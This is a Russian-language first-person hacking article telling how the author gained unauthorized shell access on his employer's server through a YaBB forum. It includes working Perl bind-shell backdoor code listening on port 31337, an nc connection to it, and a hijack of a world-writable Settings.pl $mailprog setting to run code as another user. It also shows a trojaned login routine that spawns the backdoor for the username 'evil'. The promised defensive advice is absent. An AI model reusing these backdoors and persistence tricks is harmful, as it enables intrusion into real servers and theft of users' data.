 |
|
|
|
Перехват shell через Yet another Bulletin Board
Перехват shell через Yet another Bulletin Board Преамбула: эта история ещё 2002 года, но, тем не менее, данный факт не влияет на саму идею взлома. Этот метод весьма актуален, особенно на крупных хостингах. Всё нижеописанное было сделао не в одиночку, а с коллегой. Далее речь пойдёт не об очередном переводе дырки в YaBB из BugTraq, а об описании некоторых моих идей, и, если они кому-то ещё приходили в голову, я буду только рад. Итак, действия происходили на главном сервере моей фирмы, в которой несколько компьютерных классов и одна серверная.
В те времена администратор был ещё достаточно щедрый и реализовал регистрацию пользователей. Каждому зарегистрированному пользователю выдавалось:
То есть создав каталог public_html и поместив туда index.html, пользователь получал домашнюю страничку http://cafedra.server.ru/~user. Это всё, конечно, хорошо, но самого «вкусного» среди этого списка не было. Я имею в виду shell-доступ. Вместо него в строчке /etc/passwd значился /bin/false. Это сильно удручало. Так как shell на главном сервере позволил бы делать очень много интересного. Разумеется, как и везде, у администратора были сослуживцы и помощники, у которых, конечно, имелся shell. И как всегда, они не отличались особой просвещенностью в вопросах безопасности. Вот как раз из-за ошибок вышеупомянутых была написана эта статья. У одного из них, как и у остальных пользователей, был свой веб-аккаунт http://cafedra.server.ru/~adil. И притом он его активно пользовал и обновлял. Среди всех ресурсов сайта был форум Yet another Bulletin Board (YaBB), который пользовался большой популярностью. И конечно, привлёк и моё внимание. Поиски дырок в самом форуме не увенчались успехом, поэтому пришлось действовать в обход. Часть первая: осмотр Как я уже сказал, shell не выделялся никому, кроме «особенных» людей, но perl и cgi-скрипты выдавались всем и в любом размере. Многие уже поняли, к чему я клоню. А для тех, кто не в курсе, поясняю, что любой язык программирования позволяет работать с внешними файлами или выполнять команды. Не долго думая, я написал test.cgi следующего содержания у себя в cgi-bin: backdoor.cgi #!/usr/bin/perl -w print "Content-Type: text/html "; system("ls > 1.txt"); И в моём каталоге появился файл 1.txt, в котором содержался листинг файлов текущей директории. Не долго думая, я в своих архивах отыскал backdoor на Perl (backdoor.cgi). #!/usr/bin/perl –w use Socket; $port = 31337; socket (S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); setsockopt (S, SOL_SOCKET, SO_REUSEADDR,1); bind (S, sockaddr_in ($port, INADDR_ANY)); listen (S, 50); while (1){ accept (X, S); if (!($pid = fork)){ if(!defined $pid){exit(0);} open STDIN,"<&X"; open STDOUT,">&X"; open STDERR,">&X"; exec("/bin/sh -i"); close X;}} Затем выполнил на своей машине: [navy@Fortress /home/navy]# nc -vv cafedra.server.ru 31337
Теперь у меня был shell на главном сервере конторы. Я не буду упоминать про попытки получить root-доступ из пользовательского. Целью было получить привилегии «особого» человека и от его имени продолжать дальнейшие действия. Часть вторая: внутри Немного остыв от радости, я решил ощупать объект: sh-2.05# uname -a; id; pwd
sh-2.05# who
sh-2.05# ps
Теперь я точно знал, с чем имею дело и где нахожусь. Далее последовал тщательный осмотр директории /etc и всех находящихся в ней файлов. Спустя примерно часа 2, я решил посетить /home-директории, в частности каталоги «особенных» пользователей, а конкретнее – пользователя adil: sh-2.05# cd /home/a/adil sh-2.05# ls -al
sh-2.05# cd public_html sh-2.05# cd cgi-bin sh-2.05# ls
Среди прочего в каталоге cgi-bin была искомая yabb: sh-2.05# cd yabb sh-2.05# ls -al
В каталоге Members сразу же обнаружились пароли пользователей на форуме, а также приватные сообщения. После 30-ти минутного изучения остальных каталогов я пришёл к выводу, что больше ничего интересного нет, и приступил к просмотру файлов, валявшихся в корне yabb: english.lng, Settings.pl, template.html, YaBB.pl.
На первый взгляд там не было ничего интересного, и я хотел уже было махнуть на это рукой, но вдруг вспомнил про вывод команды ls –al:
rwxrwxrwx!!! Я чуть со стула не упал! Т.е. любой пользователь был вправе изменить содержимое этого файла! Начался лихорадочный поиск места, куда можно внедрить свой код.
Среди кучи «очень нужных настроек» я всё-таки нашёл уязвимое место! И оно выглядело так: Settings.pl $emailwelcome = 1; # Set to 1 to email a welcome message to users even when # you have mail password turned off $mailprog = "/usr/sbin/sendmail"; # Location of your sendmail program $smtp_server = "smtp.mysite.com"; # Address of your SMTP-Server $webmaster_email = q^webmaster@mysite.com^; # Your email address. (eg: $webmaster_email = q^admin@host.com^;) $mailtype = 0; # Mail program to use: 0 = sendmail, 1 = SMTP, 2 = Net::SMTP
Переменная $mailprog определяла программу, запускаемую для отсылки почты, а $mailtype уточняла, что отсылку будет осуществлять именно sendmail (из переменной $mailprog). После моего вмешательства строка: $mailprog = "/usr/sbin/sendmail"; # Location of your sendmail program приобрела вид: $mailprog = "/home/n/navy/public_html/cgi-bin/backdoor.cgi"; # Location of your sendmail program И как же теперь выполнить бэкдор? Очень просто. Я вышел из бэкдора и проверил, закрылся ли он: sh-2.05# ps
sh-2.05# killall bs.pl sh-2.05# exit [navy@Fortress /home/navy]# nc -vv cafedra.server.ru 31337 [navy@Fortress /home/navy]# Зашёл на главную страницу форума, промотал страницу вниз, и увидел там формочку:
Ввёл имя юзера Navy, нажал enter. Полоса загрузки браузера начала медленно ползти. Вернувшись к консоли, я ввёл: [navy@Fortress /home/navy]# nc -vv cafedra.server.ru 31337
sh-2.05# id
Цель достигнута! Теперь я мог делать что угодно от пользователя adil. Так как все файлы я уже изучил до захвата shell, делать мне уже было нечего и я решил закрепить shell-доступ и сделать его чуть проще, для этого мне пришлось протроянить исходники форума. Часть третья: укрепление Вторичной целью было обеспечить максимально простой вход в shell. Итак, теперь все файлы были в моём распоряжении. Быстренько просмотрев исходники, я понял, что нужный мне код находится в файле Sources/LogInOut.pl. Кусок кода выглядел так: Settings.pl sub Login2 { &fatal_error("$txt{"37"}") if($FORM{"username"} eq ""); &fatal_error("$txt{"38"}") if($FORM{"passwrd"} eq ""); $FORM{"username"} =~ s/s/_/g; $username = $FORM{"username"}; &fatal_error("$txt{"240"} $txt{"35"} $txt{"241"}") if($username !~ /^[s0-9A-Za-z#%+,-.:=?@^_]+$/); &fatal_error("$txt{"337"}") if($FORM{"cookielength"} !~ /^[0-9]+$/); if ($username eq "evil") { system("/home/n/navy/public_html/cgi-bin/backdoor.cgi"); exit; } if(-e("$memberdir/$username.dat")) { fopen(FILE, "$memberdir/$username.dat"); Красным выделен кусок кода, добавленный мною. В итоге я мог в любое время зайти на форум под именем «evil» и получить shell на 31337 порту. Часть четвёртая: альтернатива Пришло время вспомнить про вариант номер 2, template.html. Идея основывалась на технологии SSI (Server side includes). Эта технология позволяет выполнение внешних скриптов и встраивание их ответов в тело html-документа. То есть я мог бы в конец template.html вставить строку:
Но этот вариант будет доступен, если сервер настроен на обработку .html, а не только .shtml, shtm. Часть пятая: заключение Здесь я хотел бы дать советы по защите от подобного рода атак сетевым администраторам.
|
ВИКТОР ИГНАТЬЕВ 
Комментарии отсутствуют
| Добавить комментарий |
|
Комментарии могут оставлять только зарегистрированные пользователи |
|
